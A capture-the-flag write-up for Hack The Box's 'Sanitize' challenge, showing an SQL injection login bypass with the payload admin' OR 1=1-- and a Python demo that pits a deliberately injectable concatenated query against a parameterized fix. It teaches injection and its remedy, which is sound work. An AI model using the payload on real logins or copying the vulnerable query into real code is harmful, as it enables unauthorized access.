HTB — Sanitize

Clarence Subia
Aug 16, 2023

Sanitize landing page:

The application is a login prompt that requires a username and a password.

1. Test the login with admin:admin to see how it behaves. After signing in, the page returns an image together with the SQL query it executed, so every probe from here on shows us exactly how our input landed in the query.

2. Let’s forward the request in BurpSuite.

3. Test the special character ' in the username parameter. Rendering the response in Burp, we can see it throws a SQL error: the lone quote terminates the string literal early and the rest of the query no longer parses.

4. Testing OR 1=1-- fails and the echoed query shows why: the payload ended up inside the string literal as 'admin OR 1=1--', so it is compared as a plain username rather than interpreted as SQL.

5. To correct this, we must terminate the admin string with a single quote of our own: admin' OR 1=1--. The quote closes the literal, OR 1=1 makes the WHERE clause true, and -- comments out the trailing AND password='...' check.

And voila!!!
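The following is an added example, not code from the challenge or from the original post. It reproduces the five probes above against an in-memory SQLite table with constructed sample credentials, using the same string-concatenated query shape the challenge echoes back, and puts the parameterized version beside it. The table name, column names and the stored password are assumptions for illustration; the challenge's real backend and schema are not shown on the page.

```python
import sqlite3


def make_db():
    """Build an in-memory users table with one constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed sample credentials, not the challenge's real data.
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery-staple')")
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Login built by string concatenation, the pattern the challenge echoes back.

    Returns (status, query, detail) where status is "ok", "denied" or "error",
    so the caller can see exactly which SQL was executed, as the challenge shows it.
    """
    query = (
        f"SELECT username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        # A lone quote breaks the literal: this is the SQL error seen in Burp.
        return ("error", query, str(exc))
    return ("ok" if row else "denied", query, row[0] if row else None)


def safe_login(conn, username, password):
    """Same lookup with bound parameters: input can never leave the literal."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(query, (username, password)).fetchone()
    return "ok" if row else "denied"


def walkthrough():
    """Replay the probes from the writeup and collect their outcomes."""
    conn = make_db()
    probes = [
        ("admin", "admin"),             # step 1: ordinary credentials
        ("'", "admin"),                 # step 3: single quote -> syntax error
        ("admin OR 1=1--", "admin"),    # step 4: payload swallowed by the literal
        ("admin' OR 1=1--", "admin"),   # step 5: quote closes literal, -- drops the rest
    ]
    return {user: vulnerable_login(conn, user, pw) for user, pw in probes}


if __name__ == "__main__":
    for user, (status, query, detail) in walkthrough().items():
        print(f"{user!r:22} -> {status:6} {query}")
```

Running it prints the executed query for each probe: the bare quote errors out, admin OR 1=1-- is denied because it never leaves the string literal, and admin' OR 1=1-- matches the admin row. One engine-specific caveat: SQLite accepts -- directly, but MySQL only treats -- as a comment when it is followed by a space (or use # instead), so if the quote-closing payload still fails on a MySQL-backed target, try admin' OR 1=1-- with a trailing space. The safe_login variant shows the fix the challenge name alludes to: with bound parameters the same payload is just a username that does not exist.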

References:

https://app.hackthebox.com/challenges/178
